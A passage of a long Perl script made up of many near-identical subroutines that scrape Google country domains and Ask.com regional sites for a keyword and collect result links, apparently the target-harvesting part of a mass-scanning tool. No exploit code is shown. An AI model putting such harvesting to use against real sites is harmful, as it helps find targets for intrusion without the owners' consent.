  8335. sub googleCL() {
  8336.  
  8337.     my @list;
  8338.  
  8339.     my $key = $_[0];
  8340.  
  8341.     for (my $i=0; $i<=1000; $i+=100){
  8342.  
  8343.         my $search = ("http://www.google.cl/search?q=".uri_escape($key)."&hl=&cr=countryCL&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8344.  
  8345.         my $res = &search_engine_query($search);
  8346.  
  8347.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8348.  
  8349.             my $link = $1;
  8350.  
  8351.             if ($link !~ /googleCL/){
  8352.  
  8353.                 my @grep = &links($link);
  8354.  
  8355.                 push(@list,@grep);
  8356.  
  8357.             }
  8358.  
  8359.         }
  8360.  
  8361.     }
  8362.  
  8363.     return @list;
  8364.  
  8365. }
  8366.  
  8367.  
  8368.  
  8369. sub googleMX() {
  8370.  
  8371.     my @list;
  8372.  
  8373.     my $key = $_[0];
  8374.  
  8375.     for (my $i=0; $i<=1000; $i+=100){
  8376.  
  8377.         my $search = ("http://www.google.com.mx/search?q=".uri_escape($key)."&hl=&cr=countryMX&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8378.  
  8379.         my $res = &search_engine_query($search);
  8380.  
  8381.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8382.  
  8383.             my $link = $1;
  8384.  
  8385.             if ($link !~ /googleMX/){
  8386.  
  8387.                 my @grep = &links($link);
  8388.  
  8389.                 push(@list,@grep);
  8390.  
  8391.             }
  8392.  
  8393.         }
  8394.  
  8395.     }
  8396.  
  8397.     return @list;
  8398.  
  8399. }
  8400.  
  8401.  
  8402.  
  8403. sub googleAU() {
  8404.  
  8405.     my @list;
  8406.  
  8407.     my $key = $_[0];
  8408.  
  8409.     for (my $i=0; $i<=1000; $i+=100){
  8410.  
  8411.         my $search = ("http://www.google.com.au/search?q=".uri_escape($key)."&hl=&cr=countryAU&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8412.  
  8413.         my $res = &search_engine_query($search);
  8414.  
  8415.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8416.  
  8417.             my $link = $1;
  8418.  
  8419.             if ($link !~ /googleAU/){
  8420.  
  8421.                 my @grep = &links($link);
  8422.  
  8423.                 push(@list,@grep);
  8424.  
  8425.             }
  8426.  
  8427.         }
  8428.  
  8429.     }
  8430.  
  8431.     return @list;
  8432.  
  8433. }
  8434.  
  8435. sleep(2);
  8436.  
  8437. sub googleRU() {
  8438.  
  8439.     my @list;
  8440.  
  8441.     my $key = $_[0];
  8442.  
  8443.     for (my $i=0; $i<=1000; $i+=100){
  8444.  
  8445.         my $search = ("http://www.google.com.ru/search?q=".uri_escape($key)."&hl=&cr=countryRU&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8446.  
  8447.         my $res = &search_engine_query($search);
  8448.  
  8449.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8450.  
  8451.             my $link = $1;
  8452.  
  8453.             if ($link !~ /googleRU/){
  8454.  
  8455.                 my @grep = &links($link);
  8456.  
  8457.                 push(@list,@grep);
  8458.  
  8459.             }
  8460.  
  8461.         }
  8462.  
  8463.     }
  8464.  
  8465.     return @list;
  8466.  
  8467. }
  8468.  
  8469.  
  8470.  
  8471. sub googleAT() {
  8472.  
  8473.     my @list;
  8474.  
  8475.     my $key = $_[0];
  8476.  
  8477.     for (my $i=0; $i<=1000; $i+=100){
  8478.  
  8479.         my $search = ("http://www.google.at/search?q=".uri_escape($key)."&hl=&cr=countryAT&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8480.  
  8481.         my $res = &search_engine_query($search);
  8482.  
  8483.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8484.  
  8485.             my $link = $1;
  8486.  
  8487.             if ($link !~ /googleAT/){
  8488.  
  8489.                 my @grep = &links($link);
  8490.  
  8491.                 push(@list,@grep);
  8492.  
  8493.             }
  8494.  
  8495.         }
  8496.  
  8497.     }
  8498.  
  8499.     return @list;
  8500.  
  8501. }
  8502.  
  8503.  
  8504.  
  8505. sub googlePL() {
  8506.  
  8507.     my @list;
  8508.  
  8509.     my $key = $_[0];
  8510.  
  8511.     for (my $i=0; $i<=1000; $i+=100){
  8512.  
  8513.         my $search = ("http://www.google.pl/search?q=".uri_escape($key)."&hl=&cr=countryPL&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8514.  
  8515.         my $res = &search_engine_query($search);
  8516.  
  8517.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8518.  
  8519.             my $link = $1;
  8520.  
  8521.             if ($link !~ /googlePL/){
  8522.  
  8523.                 my @grep = &links($link);
  8524.  
  8525.                 push(@list,@grep);
  8526.  
  8527.             }
  8528.  
  8529.         }
  8530.  
  8531.     }
  8532.  
  8533.     return @list;
  8534.  
  8535. }
  8536.  
  8537. sleep(3);
  8538.  
  8539. sub googleIL() {
  8540.  
  8541.     my @list;
  8542.  
  8543.     my $key = $_[0];
  8544.  
  8545.     for (my $i=0; $i<=1000; $i+=100){
  8546.  
  8547.         my $search = ("http://www.google.co.il/search?q=".uri_escape($key)."&hl=&cr=countryIL&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8548.  
  8549.         my $res = &search_engine_query($search);
  8550.  
  8551.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8552.  
  8553.             my $link = $1;
  8554.  
  8555.             if ($link !~ /googleIL/){
  8556.  
  8557.                 my @grep = &links($link);
  8558.  
  8559.                 push(@list,@grep);
  8560.  
  8561.             }
  8562.  
  8563.         }
  8564.  
  8565.     }
  8566.  
  8567.     return @list;
  8568.  
  8569. }
  8570.  
  8571.  
  8572.  
  8573. sub googleTR() {
  8574.  
  8575.     my @list;
  8576.  
  8577.     my $key = $_[0];
  8578.  
  8579.     for (my $i=0; $i<=1000; $i+=100){
  8580.  
  8581.         my $search = ("http://www.google.com.tr/search?q=".uri_escape($key)."&hl=&cr=countryTR&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8582.  
  8583.         my $res = &search_engine_query($search);
  8584.  
  8585.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8586.  
  8587.             my $link = $1;
  8588.  
  8589.             if ($link !~ /googleTR/){
  8590.  
  8591.                 my @grep = &links($link);
  8592.  
  8593.                 push(@list,@grep);
  8594.  
  8595.             }
  8596.  
  8597.         }
  8598.  
  8599.     }
  8600.  
  8601.     return @list;
  8602.  
  8603. }
  8604.  
  8605.  
  8606.  
  8607. sub googleUA() {
  8608.  
  8609.     my @list;
  8610.  
  8611.     my $key = $_[0];
  8612.  
  8613.     for (my $i=0; $i<=1000; $i+=100){
  8614.  
  8615.         my $search = ("http://www.google.com.ua/search?q=".uri_escape($key)."&hl=&cr=countryUA&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8616.  
  8617.         my $res = &search_engine_query($search);
  8618.  
  8619.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8620.  
  8621.             my $link = $1;
  8622.  
  8623.             if ($link !~ /googleUA/){
  8624.  
  8625.                 my @grep = &links($link);
  8626.  
  8627.                 push(@list,@grep);
  8628.  
  8629.             }
  8630.  
  8631.         }
  8632.  
  8633.     }
  8634.  
  8635.     return @list;
  8636.  
  8637. }
  8638.  
  8639. sleep(3);
  8640.  
  8641. sub googleGR() {
  8642.  
  8643.     my @list;
  8644.  
  8645.     my $key = $_[0];
  8646.  
  8647.     for (my $i=0; $i<=1000; $i+=100){
  8648.  
  8649.         my $search = ("http://www.google.gr/search?q=".uri_escape($key)."&hl=&cr=countryGR&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8650.  
  8651.         my $res = &search_engine_query($search);
  8652.  
  8653.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8654.  
  8655.             my $link = $1;
  8656.  
  8657.             if ($link !~ /googleGR/){
  8658.  
  8659.                 my @grep = &links($link);
  8660.  
  8661.                 push(@list,@grep);
  8662.  
  8663.             }
  8664.  
  8665.         }
  8666.  
  8667.     }
  8668.  
  8669.     return @list;
  8670.  
  8671. }
  8672.  
  8673.  
  8674.  
  8675. sub googleJP() {
  8676.  
  8677.     my @list;
  8678.  
  8679.     my $key = $_[0];
  8680.  
  8681.     for (my $i=0; $i<=1000; $i+=100){
  8682.  
  8683.         my $search = ("http://www.google.co.jp/search?q=".uri_escape($key)."&hl=&cr=countryJP&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8684.  
  8685.         my $res = &search_engine_query($search);
  8686.  
  8687.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8688.  
  8689.             my $link = $1;
  8690.  
  8691.             if ($link !~ /googleJP/){
  8692.  
  8693.                 my @grep = &links($link);
  8694.  
  8695.                 push(@list,@grep);
  8696.  
  8697.             }
  8698.  
  8699.         }
  8700.  
  8701.     }
  8702.  
  8703.     return @list;
  8704.  
  8705. }
  8706.  
  8707.  
  8708.  
  8709. sub googleCN() {
  8710.  
  8711.     my @list;
  8712.  
  8713.     my $key = $_[0];
  8714.  
  8715.     for (my $i=0; $i<=1000; $i+=100){
  8716.  
  8717.         my $search = ("http://www.google.cn/search?q=".uri_escape($key)."&hl=&cr=countryCN&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8718.  
  8719.         my $res = &search_engine_query($search);
  8720.  
  8721.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8722.  
  8723.             my $link = $1;
  8724.  
  8725.             if ($link !~ /googleCN/){
  8726.  
  8727.                 my @grep = &links($link);
  8728.  
  8729.                 push(@list,@grep);
  8730.  
  8731.             }
  8732.  
  8733.         }
  8734.  
  8735.     }
  8736.  
  8737.     return @list;
  8738.  
  8739. }
  8740.  
  8741. sleep(3);
  8742.  
  8743. sub googleMY() {
  8744.  
  8745.     my @list;
  8746.  
  8747.     my $key = $_[0];
  8748.  
  8749.     for (my $i=0; $i<=1000; $i+=100){
  8750.  
  8751.         my $search = ("http://www.google.com.my/search?q=".uri_escape($key)."&hl=&cr=countryMY&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8752.  
  8753.         my $res = &search_engine_query($search);
  8754.  
  8755.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8756.  
  8757.             my $link = $1;
  8758.  
  8759.             if ($link !~ /googleMY/){
  8760.  
  8761.                 my @grep = &links($link);
  8762.  
  8763.                 push(@list,@grep);
  8764.  
  8765.             }
  8766.  
  8767.         }
  8768.  
  8769.     }
  8770.  
  8771.     return @list;
  8772.  
  8773. }
  8774.  
  8775.  
  8776.  
  8777. sub googleTH() {
  8778.  
  8779.     my @list;
  8780.  
  8781.     my $key = $_[0];
  8782.  
  8783.     for (my $i=0; $i<=1000; $i+=100){
  8784.  
  8785.         my $search = ("http://www.google.co.th/search?q=".uri_escape($key)."&hl=&cr=countryTH&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8786.  
  8787.         my $res = &search_engine_query($search);
  8788.  
  8789.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8790.  
  8791.             my $link = $1;
  8792.  
  8793.             if ($link !~ /googleTH/){
  8794.  
  8795.                 my @grep = &links($link);
  8796.  
  8797.                 push(@list,@grep);
  8798.  
  8799.             }
  8800.  
  8801.         }
  8802.  
  8803.     }
  8804.  
  8805.     return @list;
  8806.  
  8807. }
  8808.  
  8809.  
  8810.  
  8811. sub googleIN() {
  8812.  
  8813.     my @list;
  8814.  
  8815.     my $key = $_[0];
  8816.  
  8817.     for (my $i=0; $i<=1000; $i+=100){
  8818.  
  8819.         my $search = ("http://www.google.co.in/search?q=".uri_escape($key)."&hl=&cr=countryIN&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8820.  
  8821.         my $res = &search_engine_query($search);
  8822.  
  8823.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8824.  
  8825.             my $link = $1;
  8826.  
  8827.             if ($link !~ /googleIN/){
  8828.  
  8829.                 my @grep = &links($link);
  8830.  
  8831.                 push(@list,@grep);
  8832.  
  8833.             }
  8834.  
  8835.         }
  8836.  
  8837.     }
  8838.  
  8839.     return @list;
  8840.  
  8841. }
  8842.  
  8843. sleep(3);
  8844.  
  8845. sub googleKR() {
  8846.  
  8847.     my @list;
  8848.  
  8849.     my $key = $_[0];
  8850.  
  8851.     for (my $i=0; $i<=1000; $i+=100){
  8852.  
  8853.         my $search = ("http://www.google.co.kr/search?q=".uri_escape($key)."&hl=&cr=countryKR&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8854.  
  8855.         my $res = &search_engine_query($search);
  8856.  
  8857.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8858.  
  8859.             my $link = $1;
  8860.  
  8861.             if ($link !~ /googleKR/){
  8862.  
  8863.                 my @grep = &links($link);
  8864.  
  8865.                 push(@list,@grep);
  8866.  
  8867.             }
  8868.  
  8869.         }
  8870.  
  8871.     }
  8872.  
  8873.     return @list;
  8874.  
  8875. }
  8876.  
  8877.  
  8878.  
  8879. sub googleRO() {
  8880.  
  8881.     my @list;
  8882.  
  8883.     my $key = $_[0];
  8884.  
  8885.     for (my $i=0; $i<=1000; $i+=100){
  8886.  
  8887.         my $search = ("http://www.google.ro/search?q=".uri_escape($key)."&hl=&cr=countryRO&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8888.  
  8889.         my $res = &search_engine_query($search);
  8890.  
  8891.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8892.  
  8893.             my $link = $1;
  8894.  
  8895.             if ($link !~ /googleRO/){
  8896.  
  8897.                 my @grep = &links($link);
  8898.  
  8899.                 push(@list,@grep);
  8900.  
  8901.             }
  8902.  
  8903.         }
  8904.  
  8905.     }
  8906.  
  8907.     return @list;
  8908.  
  8909. }
  8910.  
  8911.  
  8912.  
  8913. sub googleTW() {
  8914.  
  8915.     my @list;
  8916.  
  8917.     my $key = $_[0];
  8918.  
  8919.     for (my $i=0; $i<=1000; $i+=100){
  8920.  
  8921.         my $search = ("http://www.google.com.tw/search?q=".uri_escape($key)."&hl=&cr=countryTW&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8922.  
  8923.         my $res = &search_engine_query($search);
  8924.  
  8925.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8926.  
  8927.             my $link = $1;
  8928.  
  8929.             if ($link !~ /googleTW/){
  8930.  
  8931.                 my @grep = &links($link);
  8932.  
  8933.                 push(@list,@grep);
  8934.  
  8935.             }
  8936.  
  8937.         }
  8938.  
  8939.     }
  8940.  
  8941.     return @list;
  8942.  
  8943. }
  8944.  
  8945. sleep(3);
  8946.  
  8947. sub googleZA() {
  8948.  
  8949.     my @list;
  8950.  
  8951.     my $key = $_[0];
  8952.  
  8953.     for (my $i=0; $i<=1000; $i+=100){
  8954.  
  8955.         my $search = ("http://www.google.co.za/search?q=".uri_escape($key)."&hl=&cr=countryZA&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8956.  
  8957.         my $res = &search_engine_query($search);
  8958.  
  8959.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8960.  
  8961.             my $link = $1;
  8962.  
  8963.             if ($link !~ /googleZA/){
  8964.  
  8965.                 my @grep = &links($link);
  8966.  
  8967.                 push(@list,@grep);
  8968.  
  8969.             }
  8970.  
  8971.         }
  8972.  
  8973.     }
  8974.  
  8975.     return @list;
  8976.  
  8977. }
  8978.  
  8979.  
  8980.  
  8981. sub googlePT() {
  8982.  
  8983.     my @list;
  8984.  
  8985.     my $key = $_[0];
  8986.  
  8987.     for (my $i=0; $i<=1000; $i+=100){
  8988.  
  8989.         my $search = ("http://www.google.pt/search?q=".uri_escape($key)."&hl=&cr=countryPT&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  8990.  
  8991.         my $res = &search_engine_query($search);
  8992.  
  8993.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  8994.  
  8995.             my $link = $1;
  8996.  
  8997.             if ($link !~ /googlePT/){
  8998.  
  8999.                 my @grep = &links($link);
  9000.  
  9001.                 push(@list,@grep);
  9002.  
  9003.             }
  9004.  
  9005.         }
  9006.  
  9007.     }
  9008.  
  9009.     return @list;
  9010.  
  9011. }
  9012.  
  9013.  
  9014.  
  9015. sub ask() {
  9016.  
  9017.         my @list;
  9018.  
  9019.         my $key = $_[0];
  9020.  
  9021.         for (my $i=1; $i<=1000; $i+=100) {
  9022.  
  9023.                 my $search = ("http://uk.ask.com/web?q=".uri_escape($key)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
  9024.  
  9025.                 my $res = &search_engine_query($search);
  9026.  
  9027.                 while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  9028.  
  9029.             my $link = $1;
  9030.  
  9031.                         if ($link !~ /ask\.com/){
  9032.  
  9033.                                 my @grep = &links($link);
  9034.  
  9035.                                 push(@list,@grep);
  9036.  
  9037.                         }
  9038.  
  9039.                 }
  9040.  
  9041.         }
  9042.  
  9043.         return @list;
  9044.  
  9045. }
  9046.  
  9047.  
  9048.  
  9049. sub askCA() {
  9050.  
  9051.     my @list;
  9052.  
  9053.     my $key = $_[0];
  9054.  
  9055.     for (my $i=1; $i<=100; $i+=1) {
  9056.  
  9057.         my $search = ("http://ca.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  9058.  
  9059.         my $res = &search_engine_query($search);
  9060.  
  9061.         while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  9062.  
  9063.             my $link = $1;
  9064.  
  9065.             if ($link !~ /askCA\.com/){
  9066.  
  9067.                 my @grep = &links($link);
  9068.  
  9069.                 push(@list,@grep);
  9070.  
  9071.             }
  9072.  
  9073.         }
  9074.  
  9075.     }
  9076.  
  9077.     return @list;
  9078.  
  9079. }
  9080.  
  9081. sleep(4);
  9082.  
  9083. sub askDE() {
  9084.  
  9085.     my @list;
  9086.  
  9087.     my $key = $_[0];
  9088.  
  9089.     for (my $i=1; $i<=100; $i+=1) {
  9090.  
  9091.         my $search = ("http://de.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  9092.  
  9093.         my $res = &search_engine_query($search);
  9094.  
  9095.         while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  9096.  
  9097.             my $link = $1;
  9098.  
  9099.             if ($link !~ /askDE\.com/){
  9100.  
  9101.                 my @grep = &links($link);
  9102.  
  9103.                 push(@list,@grep);
  9104.  
  9105.             }
  9106.  
  9107.         }
  9108.  
  9109.     }
  9110.  
  9111.     return @list;
  9112.  
  9113. }
  9114.  
  9115.  
  9116.  
  9117. sub askIT() {
  9118.  
  9119.     my @list;
  9120.  
  9121.     my $key = $_[0];
  9122.  
  9123.     for (my $i=1; $i<=100; $i+=1) {
  9124.  
  9125.         my $search = ("http://it.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  9126.  
  9127.         my $res = &search_engine_query($search);
  9128.  
  9129.         while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  9130.  
  9131.             my $link = $1;
  9132.  
  9133.             if ($link !~ /askIT\.com/){
  9134.  
  9135.                 my @grep = &links($link);
  9136.  
  9137.                 push(@list,@grep);
  9138.  
  9139.             }
  9140.  
  9141.         }
  9142.  
  9143.     }
  9144.  
  9145.     return @list;
  9146.  
  9147. }
  9148.  
  9149.  
  9150.  
  9151. sub askUK() {
  9152.  
  9153.     my @list;
  9154.  
  9155.     my $key = $_[0];
  9156.  
  9157.     for (my $i=1; $i<=100; $i+=1) {
  9158.  
  9159.         my $search = ("http://uk.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  9160.  
  9161.         my $res = &search_engine_query($search);
  9162.  
  9163.         while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  9164.  
  9165.             my $link = $1;
  9166.  
  9167.             if ($link !~ /askUK\.com/){
  9168.  
  9169.                 my @grep = &links($link);
  9170.  
  9171.                 push(@list,@grep);
  9172.  
  9173.             }
  9174.  
  9175.         }
  9176.  
  9177.     }
  9178.  
  9179.     return @list;
  9180.  
  9181. }
  9182.  
  9183.  
  9184.  
  9185. sub askFR() {
  9186.  
  9187.     my @list;
  9188.  
  9189.     my $key = $_[0];
  9190.  
  9191.     for (my $i=1; $i<=100; $i+=1) {
  9192.  
  9193.         my $search = ("http://fr.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  9194.  
  9195.         my $res = &search_engine_query($search);
  9196.  
  9197.         while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  9198.  
  9199.             my $link = $1;
  9200.  
  9201.             if ($link !~ /askFR\.com/){
  9202.  
  9203.                 my @grep = &links($link);
  9204.  
  9205.                 push(@list,@grep);
  9206.  
  9207.             }
  9208.  
  9209.         }
  9210.  
  9211.     }
  9212.  
  9213.     return @list;
  9214.  
  9215. }
  9216.  
  9217.  
  9218.  
  9219. sub askES() {
  9220.  
  9221.     my @list;
  9222.  
  9223.     my $key = $_[0];
  9224.  
  9225.     for (my $i=1; $i<=100; $i+=1) {
  9226.  
  9227.         my $search = ("http://es.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  9228.  
  9229.         my $res = &search_engine_query($search);
  9230.  
  9231.         while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  9232.  
  9233.             my $link = $1;
  9234.  
  9235.             if ($link !~ /askES\.com/){
  9236.  
  9237.                 my @grep = &links($link);
  9238.  
  9239.                 push(@list,@grep);
  9240.  
  9241.             }
  9242.  
  9243.         }
  9244.  
  9245.     }
  9246.  
  9247.     return @list;
  9248.  
  9249. }
  9250.  
  9251.  
  9252.  
  9253. sub askRU() {
  9254.  
  9255.     my @list;
  9256.  
  9257.     my $key = $_[0];
  9258.  
  9259.     for (my $i=1; $i<=100; $i+=1) {
  9260.  
  9261.         my $search = ("http://ru.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  9262.  
  9263.         my $res = &search_engine_query($search);
  9264.  
  9265.         while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  9266.  
  9267.             my $link = $1;
  9268.  
  9269.             if ($link !~ /askRU\.com/){
  9270.  
  9271.                 my @grep = &links($link);
  9272.  
  9273.                 push(@list,@grep);
  9274.  
  9275.             }
  9276.  
  9277.         }
  9278.  
  9279.     }
  9280.  
  9281.     return @list;
  9282.  
  9283. }
  9284.  
  9285. sleep(4);
  9286.  
  9287. sub askNL() {
  9288.  
  9289.     my @list;
  9290.  
  9291.     my $key = $_[0];
  9292.  
  9293.     for (my $i=1; $i<=100; $i+=1) {
  9294.  
  9295.         my $search = ("http://nl.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  9296.  
  9297.         my $res = &search_engine_query($search);
  9298.  
  9299.         while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  9300.  
  9301.             my $link = $1;
  9302.  
  9303.             if ($link !~ /askNL\.com/){
  9304.  
  9305.                 my @grep = &links($link);
  9306.  
  9307.                 push(@list,@grep);
  9308.  
  9309.             }
  9310.  
  9311.         }
  9312.  
  9313.     }
  9314.  
  9315.     return @list;
  9316.  
  9317. }
  9318.  
  9319.  
  9320.  
  9321. sub askPL() {
  9322.  
  9323.     my @list;
  9324.  
  9325.     my $key = $_[0];
  9326.  
  9327.     for (my $i=1; $i<=100; $i+=1) {
  9328.  
  9329.         my $search = ("http://pl.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  9330.  
  9331.         my $res = &search_engine_query($search);
  9332.  
  9333.         while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  9334.  
  9335.             my $link = $1;
  9336.  
  9337.             if ($link !~ /askPL\.com/){
  9338.  
  9339.                 my @grep = &links($link);
  9340.  
  9341.                 push(@list,@grep);
  9342.  
  9343.             }
  9344.  
  9345.         }
  9346.  
  9347.     }
  9348.  
  9349.     return @list;
  9350.  
  9351. }
  9352.  
  9353.  
  9354.  
  9355. sub askAT() {
  9356.  
  9357.     my @list;
  9358.  
  9359.     my $key = $_[0];
  9360.  
  9361.     for (my $i=1; $i<=100; $i+=1) {
  9362.  
  9363.         my $search = ("http://at.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  9364.  
  9365.         my $res = &search_engine_query($search);
  9366.  
  9367.         while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  9368.  
  9369.             my $link = $1;
  9370.  
  9371.             if ($link !~ /askAT\.com/){
  9372.  
  9373.                 my @grep = &links($link);
  9374.  
  9375.                 push(@list,@grep);
  9376.  
  9377.             }
  9378.  
  9379.         }
  9380.  
  9381.     }
  9382.  
  9383.     return @list;
  9384.  
  9385. }
  9386.  
  9387.  
  9388.  
  9389. sub askSE() {
  9390.  
  9391.     my @list;
  9392.  
  9393.     my $key = $_[0];
  9394.  
  9395.     for (my $i=1; $i<=100; $i+=1) {
  9396.  
  9397.         my $search = ("http://se.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  9398.  
  9399.         my $res = &search_engine_query($search);
  9400.  
  9401.         while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  9402.  
  9403.             my $link = $1;
  9404.  
  9405.             if ($link !~ /askSE\.com/){
  9406.  
  9407.                 my @grep = &links($link);
  9408.  
  9409.                 push(@list,@grep);
  9410.  
  9411.             }
  9412.  
  9413.         }
  9414.  
  9415.     }
  9416.  
  9417.     return @list;
  9418.  
  9419. }
  9420.  
  9421.  
  9422.  
  9423. sub askDK() {
  9424.  
  9425.     my @list;
  9426.  
  9427.     my $key = $_[0];
  9428.  
  9429.     for (my $i=1; $i<=100; $i+=1) {
  9430.  
  9431.         my $search = ("http://dk.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  9432.  
  9433.         my $res = &search_engine_query($search);
  9434.  
  9435.         while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  9436.  
  9437.             my $link = $1;
  9438.  
  9439.             if ($link !~ /askDK\.com/){
  9440.  
  9441.                 my @grep = &links($link);
  9442.  
  9443.                 push(@list,@grep);
  9444.  
  9445.             }
  9446.  
  9447.         }
  9448.  
  9449.     }
  9450.  
  9451.     return @list;
  9452.  
  9453. }
  9454.  
  9455.  
  9456.  
  9457. sub askNO() {
  9458.  
  9459.     my @list;
  9460.  
  9461.     my $key = $_[0];
  9462.  
  9463.     for (my $i=1; $i<=100; $i+=1) {
  9464.  
  9465.         my $search = ("http://no.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  9466.  
  9467.         my $res = &search_engine_query($search);
  9468.  
  9469.         while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  9470.  
  9471.             my $link = $1;
  9472.  
  9473.             if ($link !~ /askNO\.com/){
  9474.  
  9475.                 my @grep = &links($link);
  9476.  
  9477.                 push(@list,@grep);
  9478.  
  9479.             }
  9480.  
  9481.         }
  9482.  
  9483.     }
  9484.  
  9485.     return @list;
  9486.  
  9487. }
  9488.  
  9489. sleep(4);
  9490.  
  9491. sub askAU() {
  9492.  
  9493.     my @list;
  9494.  
  9495.     my $key = $_[0];
  9496.  
  9497.     for (my $i=1; $i<=100; $i+=1) {
  9498.  
  9499.         my $search = ("http://au.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  9500.  
  9501.         my $res = &search_engine_query($search);
  9502.  
  9503.         while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  9504.  
  9505.             my $link = $1;
  9506.  
  9507.             if ($link !~ /askAU\.com/){
  9508.  
  9509.                 my @grep = &links($link);
  9510.  
  9511.                 push(@list,@grep);
  9512.  
  9513.             }
  9514.  
  9515.         }
  9516.  
  9517.     }
  9518.  
  9519.     return @list;
  9520.  
  9521. }
  9522.  
  9523.  
  9524.  
  9525. sub askBR() {
  9526.  
  9527.     my @list;
  9528.  
  9529.     my $key = $_[0];
  9530.  
